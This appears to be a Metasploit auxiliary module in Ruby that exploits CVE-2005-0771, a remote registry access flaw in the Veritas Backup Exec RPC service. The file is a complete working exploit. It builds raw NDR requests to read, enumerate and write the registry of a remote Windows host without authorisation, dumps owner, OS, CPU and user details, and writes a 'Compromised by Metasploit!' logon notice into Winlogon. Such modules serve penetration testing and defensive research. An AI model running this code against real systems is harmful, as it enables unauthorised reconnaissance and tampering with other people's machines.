##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
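class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC
  include Msf::Post::Windows::Registry

  # Subkey under HKLM that holds the Windows NT version strings read by
  # system_info; logon_notice writes beneath its Winlogon child.
  NT_CURRENT_VERSION = 'Software\\Microsoft\\Windows NT\\CurrentVersion'

  # Interface UUID of the Backup Exec registry RPC service this module talks to.
  BACKUPEXEC_REG_UUID = '93841fd0-16ce-11ce-850d-02608c44967b'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Veritas Backup Exec Server Registry Access',
        'Description' => %q{
          This modules exploits a remote registry access flaw in the BackupExec Windows
          Server RPC service. This vulnerability was discovered by Pedram Amini and is based
          on the NDR stub information posted to openrce.org.
          Please see the action list for the different attack modes.

        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '17627' ],
          [ 'CVE', '2005-0771' ],
          [ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],
        ],
        'Actions' => [
          ['System Information', 'Description' => 'Dump system info (user, owner, OS, CPU...)'],
          ['Create Logon Notice', 'Description' => 'Add a logon notice']
        ],
        'DefaultAction' => 'System Information'
      )
    )

    register_options(
      [
        Opt::RPORT(6106),
        OptString.new(
          'WARN',
          [
            false,
            'The warning to display for the Logon Notice action',
            "Compromised by Metasploit!\r\n"
          ]
        ),
      ]
    )
  end

  #
  # Console commands made available while this module is loaded.
  # cmd_regenum exists below but its command stays unregistered, as the
  # original author left it.
  #
  def auxiliary_commands
    {
      'regread' => 'Read a registry value',
      # "regenum" => "Enumerate registry keys",
    }
  end

  #
  # Dispatch on the selected action; unknown action names fall through
  # silently, which is acceptable because the framework validates the name
  # against the 'Actions' list above.
  #
  def run
    case action.name
    when 'System Information'
      system_info
    when 'Create Logon Notice'
      logon_notice
    end
  end

  #
  # Console command: read one registry value.
  #
  # @param args [Array<String>] args[0] is a path of the form
  #   HIVE\Sub\Key\ValueName: the first component is the hive, the last is
  #   the value name and everything in between forms the subkey.
  #
  def cmd_regread(*args)
    if args.empty?
      print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
      return
    end

    paths = args[0].split("\\")
    hive = paths.shift
    subval = paths.pop
    subkey = paths.join("\\")
    data = backupexec_regread(hive, subkey, subval)

    if data
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
    end
  end

  #
  # Console command: enumerate a registry key.
  #
  # @param args [Array<String>] args[0] is a path of the form HIVE\Sub\Key;
  #   the subkey sent to the service is prefixed with a backslash.
  #
  def cmd_regenum(*args)
    if args.empty?
      print_status("Usage: regenum HKLM\\\\Software")
      return
    end

    paths = args[0].split("\\")
    hive = paths.shift
    subkey = "\\" + paths.join("\\")
    data = backupexec_regenum(hive, subkey)

    if data
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to enumerate #{hive}\\#{subkey}...")
    end
  end

  #
  # Action 'System Information': read a handful of well-known values and
  # print them. Each read falls back to a placeholder when the service
  # returns nothing, so a partial failure still produces output.
  #
  def system_info
    print_status("Dumping system information...")

    prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
    prod_name = backupexec_regread('HKLM', NT_CURRENT_VERSION, 'ProductName') || 'Windows (Unknown)'
    prod_sp = backupexec_regread('HKLM', NT_CURRENT_VERSION, 'CSDVersion') || 'No Service Pack'
    owner = backupexec_regread('HKLM', NT_CURRENT_VERSION, 'RegisteredOwner') || 'Unknown Owner'
    company = backupexec_regread('HKLM', NT_CURRENT_VERSION, 'RegisteredOrganization') || 'Unknown Company'
    cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
    username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'

    print_status("The current interactive user is #{deunicode(username)}")
    print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
    print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
    print_status("The system runs on a #{deunicode(cpu)}")
  end

  #
  # Action 'Create Logon Notice': write the WARN option as the Winlogon
  # LegalNoticeText and set a fixed LegalNoticeCaption. The return values of
  # the two writes are not checked, matching the original behaviour.
  #
  def logon_notice
    warn = datastore['WARN'].to_s
    winlogon = "#{NT_CURRENT_VERSION}\\Winlogon"

    print_status("Setting the logon warning to #{warn.strip}...")
    backupexec_regwrite('HKLM', winlogon, 'LegalNoticeText', REG_SZ, warn)
    backupexec_regwrite('HKLM', winlogon, 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
  end

  #
  # Strip the NUL bytes of a UTF-16LE registry string and surrounding
  # whitespace so the value is printable.
  #
  # @param str [String] raw value bytes as returned by the service
  # @return [String]
  #
  def deunicode(str)
    str.gsub(/\x00/, '').strip
  end

  #
  # Write a registry value (RPC operation 5).
  #
  # @param hive [String] hive name accepted by registry_hive_lookup (e.g. 'HKLM')
  # @param subkey [String] key path below the hive
  # @param subval [String] value name
  # @param type [Integer] registry value type (REG_SZ, ...)
  # @param data [String] value data; REG_SZ/REG_EXPAND_SZ data is converted
  #   to UTF-16LE by backupexec_regrpc_write
  # @return [Boolean] false when the service returned no stub data, true otherwise
  #
  def backupexec_regwrite(hive, subkey, subval, type, data)
    stub = backupexec_regrpc_write(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey,
      :subval => subval,
      :type => type,
      :data => data
    )
    resp = backupexec_regrpc_call(5, stub)
    !resp.empty?
  end

  #
  # Read a registry value (RPC operation 4).
  #
  # @param hive [String] hive name accepted by registry_hive_lookup
  # @param subkey [String] key path below the hive
  # @param subval [String] value name
  # @param type [Integer] requested value type, REG_SZ by default
  # @return [String, nil] the raw value bytes, or nil on an empty, truncated
  #   or failed reply
  #
  def backupexec_regread(hive, subkey, subval, type = REG_SZ)
    stub = backupexec_regrpc_read(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey,
      :subval => subval,
      :type => type
    )
    resp = backupexec_regrpc_call(4, stub)
    backupexec_regrpc_payload(resp)
  end

  #
  # Enumerate a registry key (RPC operation 7).
  #
  # @param hive [String] hive name accepted by registry_hive_lookup
  # @param subkey [String] key path below the hive
  # @return [String, nil] the raw reply payload, or nil on an empty,
  #   truncated or failed reply
  #
  def backupexec_regenum(hive, subkey)
    stub = backupexec_regrpc_enum(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey
    )
    resp = backupexec_regrpc_call(7, stub)
    # The original dumped the raw reply with `p resp` here; that was a leftover
    # debug print that wrote binary to the process stdout, bypassing the
    # framework's output handling, so it has been dropped.
    backupexec_regrpc_payload(resp)
  end

  #
  # Parse the stub data returned by the read (4) and enum (7) operations.
  # The reply starts with two little-endian 32-bit words: a status word that
  # is treated as failure when zero, and the byte length of the payload that
  # follows at offset 8.
  #
  # @param resp [String, nil] raw stub data from backupexec_regrpc_call
  # @return [String, nil] the payload, or nil when the reply is missing,
  #   shorter than its 8-byte header (unpack would otherwise yield nils and
  #   the slice would raise), reports failure, or carries no data
  #
  def backupexec_regrpc_payload(resp)
    return nil if resp.nil? || resp.length < 8

    ret, len = resp[0, 8].unpack('VV')
    return nil if ret == 0 || len == 0

    resp[8, len]
  end

  #
  # Call the backupexec registry service: bind to its interface over
  # ncacn_ip_tcp on RPORT, invoke the operation, and return the stub data of
  # the last response ('' when there is none). The connection is always torn
  # down, including when the bind or call raises, so a failed call cannot
  # leave a socket open behind the module.
  #
  # @param opnum [Integer] RPC operation number
  # @param data [String] NDR-encoded request stub
  # @return [String] response stub data, possibly empty
  #
  def backupexec_regrpc_call(opnum, data = '')
    handle = dcerpc_handle(
      BACKUPEXEC_REG_UUID, '1.0',
      'ncacn_ip_tcp', [datastore['RPORT']]
    )

    dcerpc_bind(handle)
    dcerpc.call(opnum, data)

    last = dcerpc.last_response
    (last && last.stub_data) ? last.stub_data : ''
  ensure
    # NOTE(review): disconnect is assumed to tolerate a never-opened socket
    # when dcerpc_handle/dcerpc_bind fail early — confirm against the Tcp mixin.
    disconnect
  end

  #
  # Build the request stub for RPC operation 4 (read).
  #
  # @param opts [Hash] :subkey, :subval (strings, default ''), :hive (default
  #   HKEY_LOCAL_MACHINE), :type (default REG_SZ)
  # @return [String] NDR-encoded stub
  #
  def backupexec_regrpc_read(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE
    type = opts[:type] || REG_SZ

    # The 1024 presumably bounds the reply buffer and the trailing 4/4/hive
    # words look like an NDR pointer to the hive handle; neither is documented
    # here, so the layout is reproduced exactly as the original.
    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(1024) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end

  #
  # Build the request stub for RPC operation 7 (enumerate).
  #
  # @param opts [Hash] :subkey (string, default ''), :hive (default
  #   HKEY_LOCAL_MACHINE)
  # @return [String] NDR-encoded stub
  #
  def backupexec_regrpc_enum(opts = {})
    subkey = opts[:subkey] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE

    # 4096 presumably bounds the reply buffer — same caveat as the read stub.
    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.long(4096) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end

  #
  # Build the request stub for RPC operation 5 (write).
  #
  # @param opts [Hash] :subkey, :subval, :data (strings, default ''), :hive
  #   (default HKEY_LOCAL_MACHINE), :type (default REG_SZ)
  # @return [String] NDR-encoded stub; string-typed data is sent as
  #   NUL-terminated UTF-16LE, with its byte length given twice before it
  #
  def backupexec_regrpc_write(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE
    type = opts[:type] || REG_SZ
    data = opts[:data] || ''

    if type == REG_SZ || type == REG_EXPAND_SZ
      data = Rex::Text.to_unicode(data + "\x00")
    end

    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(data.length) +
      NDR.long(data.length) +
      data +
      NDR.align(data) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end
end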